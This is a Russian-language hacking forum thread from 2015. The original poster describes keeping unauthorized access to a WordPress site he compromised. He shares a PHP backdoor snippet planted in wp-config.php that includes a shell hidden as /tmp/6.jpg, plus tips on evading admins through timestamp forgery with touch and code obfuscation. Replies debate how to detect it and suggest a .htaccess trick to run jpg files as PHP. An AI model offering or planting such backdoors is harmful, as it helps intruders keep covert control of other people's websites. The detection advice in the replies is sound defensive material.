ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.07.2015, 18:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Пару недель назад решил взять себя в руки, и начать учить PHP, а то паскаль не в счёт. Есть у меня один сайт, в котором я нехило накосячил по неопытности, в итоге админы посносили все шеллы, и начали регулярно проверять на наличие блох.
Первым действием я поискал на форуме, затем погуглил, прочитавши все способы понял, что ловить с них нечего. Всё в конечном итоге сводится к тому, что-бы добавить что-то в .htaccess, а мои админы это палят. Еще конечно был вариант с Cron'ом на линуксе, но это ужасно неудобно, ведь однажды админы разозлятся и пофиксят валнераблу.
И тут мне пришла идея, вроде всё просто, но это работает:
Код:
Code:
$data = $_GET['youpass'];
if ($data == "youpass")
include "/tmp/6.jpg";
Для начала, нам нужно найти какой-нибудь PHP'шник, который не будет давать никакого результат на экран. В моем случае сайт стоит на WP, и я выбрал wp-config.php. В PHP есть очень хорошая команда include, которой всё равно на расширение. Она открывает и выполняет код, т.е можно запихнуть шелл в любую папку доступную для записи с любым расширением.
Минусы: - [COLOR="rgb(255, 166, 77)"]От админов, которые умеют читать логи ничего не спасёт.[/COLOR]
Прошло 3 недели. а шелл никто не фиксит. Способ работает.Вообщем-то всё. Надеюсь мои занятия по PHP не пройдут даром) |
|
|
|
28.07.2015, 19:48
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
это палит access_log. плюс, если админы не проверяют все файлы на сервере - это горе админы. wp-config не должен вообще быть в access логе, а если есть - значит что-то не так. способ хорош только для тех, кто только что познакомился с интернетом. без обид
|
|
|
28.07.2015, 19:55
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Filipp
Filipp said:
↑
Первым действием я поискал на форуме, затем погуглил, прочитавши все способы понял, что ловить с них нечего. Вы представляете, что есле весомые способы были в паблике, то они перестале бы быть таковыми
P.S: Метод с легкостью палится
|
|
|
|
28.07.2015, 21:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от yarbabin
yarbabin said:
↑
это палит access_log Любой шелл палят логи, если их нельзя удалить)) Бэкдоры оставляют именно таким способом. Wp-config был приведен как пример, обычно есть еще масса других PHP'шников. Вот как вы поймете что на сайте шелл?) Описанный мной метод занимает 1-2КБ веса, что почти незаметно) + код можно закриптить. Далее touch'ишь по дате, и всё. Единственный способ это сравнения веса файла, и то, файлы обновляются, вдруг эту модификацию внесло какое-нить дополнение или плагин? Только если очень грамотный админ спалит. Вот если бы вы были админом античата, вы бы такое спалили? Допустим логов нет, тут всё понятно, те кто дружат с логами это спалят.
|
|
|
|
28.07.2015, 21:49
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Спалить можно по дате создания и изменения файлов, это раз! по поиску в файлах
$_GET, это два, по хешь суммам оригинальной CMS и про трояненой!
|
|
|
|
28.07.2015, 22:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
а файл, который вы инклудите, это что? он тоже ничего не весит?
|
|
|
|
28.07.2015, 22:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
с таким же успехом залейте htaccess и пусть jpg исполняется как php
|
|
|
|
28.07.2015, 22:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от winstrool
winstrool said:
↑
Спалить можно по дате создания и изменения файлов, это раз! по поиску в файлах
$_GET, это два, по хешь суммам оригинальной CMS и про трояненой! Я же написал, дату поменять touch'ем как раз плюнуть. Код можно обфусифицировать, и уже поиск &_GET не поможет. Хеш сумма это да, но обычно часто движок может чё-то дописать. Разобраться где бэкдор, а где работа движка сможет разобраться только опытный админ.
|
|
|
|
28.07.2015, 22:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от yarbabin
yarbabin said:
↑
с таким же успехом залейте htaccess и пусть jpg исполняется как php Палиться) Это слишком подозрительно, после того как админы поудаляли шелл, и зайдя в htaccess состоящий с одной строчки сразу всё понятно. У меня это спалили через два часа. А по поводу файла который инклудится, обратите внимания на его путь. Вы бы додумались искать шелл в темповской папке, ил любой другой с правами на запись?
|
|
|
|
28.07.2015, 22:27
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Filipp
Filipp said:
↑
Я же написал, дату поменять touch'ем как раз плюнуть. Код можно обфусифицировать, и уже поиск &_GET не поможет. Хеш сумма это да, но обычно часто движок может чё-то дописать. Разобраться где бэкдор, а где работа движка сможет разобраться только опытный админ. Ну об обуссифекации вы тут ничего не писали, а touch'ем вы можете поменять дату изменения, но ни как не дату создания!
Сообщение от Filipp
Filipp said:
↑
Палиться) Это слишком подозрительно, после того как админы поудаляли шелл, и зайдя в htaccess состоящий с одной строчки сразу всё понятно. У меня это спалили через два часа. Да уж, я бы никогда не догадался, что в .htaccess можно спрятать шелл)))))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
